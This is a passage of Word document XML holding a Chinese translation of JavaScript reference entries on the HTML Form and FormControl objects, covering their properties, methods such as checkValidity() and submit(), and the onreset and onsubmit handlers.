        <w:t>文档中的每一个表单都表示为</w:t>
      </w:r>
      <w:r>
        <w:t>docuement.forms[]</w:t>
      </w:r>
      <w:r>
        <w:t>数组的一个元素。表单的元</w:t>
      </w:r>
      <w:r>
        <w:t>素（如按钮、输入框、复选框等）都收集在类数组对象</w:t>
      </w:r>
      <w:r>
        <w:t>Form.elements</w:t>
      </w:r>
      <w:r>
        <w:t>中。指定名字的表单控件可以直接通过名字引用：控件名可以像</w:t>
      </w:r>
      <w:r>
        <w:t>Form</w:t>
      </w:r>
      <w:r>
        <w:t>对象的属性名一样使用。也就是说，如果要在表单</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>中引用一个</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>属性为</w:t>
      </w:r>
      <w:r>
        <w:t>"phone"</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>Input</w:t>
      </w:r>
      <w:r>
        <w:t>元素，可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>表达式</w:t>
      </w:r>
      <w:r>
        <w:t>f.phone</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>关于</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>表单的更多内容可参见</w:t>
      </w:r>
      <w:r>
        <w:t>15.9</w:t>
      </w:r>
      <w:r>
        <w:t>节。关于表单中可以使用的表单控件的更多内容请参考</w:t>
      </w:r>
      <w:r>
        <w:t>FormControl</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>FieldSet</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Input</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Label</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Select</w:t>
      </w:r>
      <w:r>
        <w:t>以及</w:t>
      </w:r>
      <w:r>
        <w:t>TextArea</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>本页描述</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>表单特性，在</w:t>
      </w:r>
      <w:r>
        <w:t>写作本书时，这些特性还没有广泛实现。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这儿列出的大部分属性只是同名的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性的简单映射。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string acceptCharset</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>一个或多个允许的字符集，其中的表单数据可能会编码之后再提交。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string action</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>表单提交到的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string autocomplete</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>字符串</w:t>
      </w:r>
      <w:r>
        <w:t>"on"</w:t>
      </w:r>
      <w:r>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:t>"off"</w:t>
      </w:r>
      <w:r>
        <w:t>。如果为</w:t>
      </w:r>
      <w:r>
        <w:t>"on"</w:t>
      </w:r>
      <w:r>
        <w:t>，浏览器将根据之前访问本页时保存的值预填表单控件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly HTMLFormControlsCollection elements</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一个类数组对象，由当前表单包含的</w:t>
      </w:r>
      <w:r>
        <w:t>表单控件组成。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string enctype</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>指定表单控件的值提交前的编码方式。该属性合法的值如下：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·"application/x-www-form-urlencoded"</w:t>
      </w:r>
      <w:r>
        <w:t>（默认）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·"multipart/form-data"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·"text/plain"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly long length</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>elements</w:t>
      </w:r>
      <w:r>
        <w:t>属性表示的表单控件的数目。表单元素自身就表现得有点像表单控件的类数组对象，对于一个表单</w:t>
      </w:r>
      <w:r>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>及一个整数</w:t>
      </w:r>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>来说，表达式</w:t>
      </w:r>
      <w:r>
        <w:t>f[n]</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>f.elements[n]</w:t>
      </w:r>
      <w:r>
        <w:t>是一样的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string method</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>用于提交表单到</w:t>
      </w:r>
      <w:r>
        <w:t>action URL</w:t>
      </w:r>
      <w:r>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>方法。只能是</w:t>
      </w:r>
      <w:r>
        <w:t>"get"</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>"post"</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>表单的名字，由</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>属性指定。可以将这个属性的值作为文档对象的</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>属性使用，对应的文档属性的值为这个</w:t>
      </w:r>
      <w:r>
        <w:t>Form</w:t>
      </w:r>
      <w:r>
        <w:t>对象。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>boolean noValidate</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果表单在提交之前没有验证则为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>。这个属性是</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>novalidate</w:t>
      </w:r>
      <w:r>
        <w:t>属性的镜像。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string target</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>窗口或窗体（</w:t>
      </w:r>
      <w:r>
        <w:t>frame</w:t>
      </w:r>
      <w:r>
        <w:t>）的名字，用于显示表单提交之后的返回文档。</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boolean checkValidi</w:t>
      </w:r>
      <w:r>
        <w:t>ty()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在支持表单验证的浏览器中，这个方法将检查每个表单控件的有效性。如果所有表单控件都有效则返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>，如果任何控件无效，它将在该控件触发一个</w:t>
      </w:r>
      <w:r>
        <w:t>invalid</w:t>
      </w:r>
      <w:r>
        <w:t>事件，然后返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void dispatchFormChange()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法在当前表单的每个控件上触发一个</w:t>
      </w:r>
      <w:r>
        <w:t>formchange</w:t>
      </w:r>
      <w:r>
        <w:t>事件。通常在用户的输入触发一个</w:t>
      </w:r>
      <w:r>
        <w:t>change</w:t>
      </w:r>
      <w:r>
        <w:t>事件时表单会自动触发这个事件，所以一般不需要调用这个方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void dispatchFormInput()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个方法在当前表单的每个控件上触发一个</w:t>
      </w:r>
      <w:r>
        <w:t>forminput</w:t>
      </w:r>
      <w:r>
        <w:t>事件</w:t>
      </w:r>
      <w:r>
        <w:t>。通常在用户的输入触发</w:t>
      </w:r>
      <w:r>
        <w:t>input</w:t>
      </w:r>
      <w:r>
        <w:t>事件时表单会自动触发这个事件，所以一般不需要调用这个方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void reset()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将所有表单元素重设为它们的默认值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>void submit()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>手动提交当前表单，不触发</w:t>
      </w:r>
      <w:r>
        <w:t>submit</w:t>
      </w:r>
      <w:r>
        <w:t>事件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>事件处理程序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>与表单相关的这些事件处理程序属性是定义在</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>上的，但由于它们在</w:t>
      </w:r>
      <w:r>
        <w:t>Form</w:t>
      </w:r>
      <w:r>
        <w:t>元素上触发，因此这儿也列出了更多的细节。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>onreset</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在表单的元素重置之前调用。可通过返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>或取消这个事件来阻止重置。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>onsubmit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在表单提交之前调用。可通过返回</w:t>
      </w:r>
      <w:r>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>取消这个事件来阻止提交。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="826" w:name="FormControl"/>
      <w:r>
        <w:t>FormControl</w:t>
      </w:r>
      <w:bookmarkEnd w:id="826"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>所有表单控件的通用特性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>大多数</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>表单控件是＜</w:t>
      </w:r>
      <w:r>
        <w:t>input</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素，但表单也可以包含＜</w:t>
      </w:r>
      <w:r>
        <w:t>button</w:t>
      </w:r>
      <w:r>
        <w:t>＞、＜</w:t>
      </w:r>
      <w:r>
        <w:t>select</w:t>
      </w:r>
      <w:r>
        <w:t>＞以及＜</w:t>
      </w:r>
      <w:r>
        <w:t>textarea</w:t>
      </w:r>
      <w:r>
        <w:t>＞控件。这一页是关于这些元素类型都有的特性的文档。关于</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>表单的介绍可参见</w:t>
      </w:r>
      <w:r>
        <w:t>15.9</w:t>
      </w:r>
      <w:r>
        <w:t>节，关于表单及表单控件的更多内容可参考</w:t>
      </w:r>
      <w:r>
        <w:t>Form</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Input</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Select</w:t>
      </w:r>
      <w:r>
        <w:t>以及</w:t>
      </w:r>
      <w:r>
        <w:t>TextArea</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>fieldset</w:t>
      </w:r>
      <w:r>
        <w:t>＞和＜</w:t>
      </w:r>
      <w:r>
        <w:t>output</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素实现这儿描述的属性中的大多数，但不是所有。本参考页将</w:t>
      </w:r>
      <w:r>
        <w:t>FieldSet</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Output</w:t>
      </w:r>
      <w:r>
        <w:t>对象作为</w:t>
      </w:r>
      <w:r>
        <w:t>Form</w:t>
      </w:r>
      <w:r>
        <w:t>Controls</w:t>
      </w:r>
      <w:r>
        <w:t>处理，虽然它们没有实现所有属性。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>本页包含部分</w:t>
      </w:r>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r>
        <w:t>表单特性（特别是表单验证）的描述，在写作本书的时候，这些特性还没有广泛实现。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>属性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>boolean autofocus</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果文档一加载本控件就能自动获得键盘焦点，则本属性值为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>。（</w:t>
      </w:r>
      <w:r>
        <w:t>FieldSet</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Output</w:t>
      </w:r>
      <w:r>
        <w:t>控件没有实现本属性。）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>boolean disabled</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果当前表单控件禁用则为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">t ru </w:t>
      </w:r>
      <w:r>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t>。禁用的控件不会响应用户的输入，也不会参与表单验证。（</w:t>
      </w:r>
      <w:r>
        <w:t>Output</w:t>
      </w:r>
      <w:r>
        <w:t>元素没有实现这个属性；</w:t>
      </w:r>
      <w:r>
        <w:t>FieldSet</w:t>
      </w:r>
      <w:r>
        <w:t>元素使用它来禁用其包含的所有控件。）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly Form form</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>引用拥有当前控件的</w:t>
      </w:r>
      <w:r>
        <w:t>Form</w:t>
      </w:r>
      <w:r>
        <w:t>，如果没有对应的表单则为</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>。如果一个控件包含在一个＜</w:t>
      </w:r>
      <w:r>
        <w:t>form</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素中，就说该</w:t>
      </w:r>
      <w:r>
        <w:t>form</w:t>
      </w:r>
      <w:r>
        <w:t>拥有这个元素。</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>否则，如果控件有一个</w:t>
      </w:r>
      <w:r>
        <w:t>HTML form</w:t>
      </w:r>
      <w:r>
        <w:t>属性，并指定某个＜</w:t>
      </w:r>
      <w:r>
        <w:t>form</w:t>
      </w:r>
      <w:r>
        <w:t>＞的</w:t>
      </w:r>
      <w:r>
        <w:t>ID</w:t>
      </w:r>
      <w:r>
        <w:t>，则那个指定的表单就是本控件的拥有者。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>readonly NodeList labels</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>与当前控件相关的所有</w:t>
      </w:r>
      <w:r>
        <w:t>Label</w:t>
      </w:r>
      <w:r>
        <w:t>元素组成</w:t>
      </w:r>
      <w:r>
        <w:t>的一个类数组对象。（</w:t>
      </w:r>
      <w:r>
        <w:t>FieldSet</w:t>
      </w:r>
      <w:r>
        <w:t>控件没有实现这个属性。）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>当前控件的</w:t>
      </w:r>
      <w:r>
        <w:t>HTML name</w:t>
      </w:r>
      <w:r>
        <w:t>属性的值。控件的</w:t>
      </w:r>
      <w:r>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t>可用做</w:t>
      </w:r>
      <w:r>
        <w:t>Form</w:t>
      </w:r>
      <w:r>
        <w:t>元素的属性：该属性的值就是这个控件元素。提交表单时也会用到控件名。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
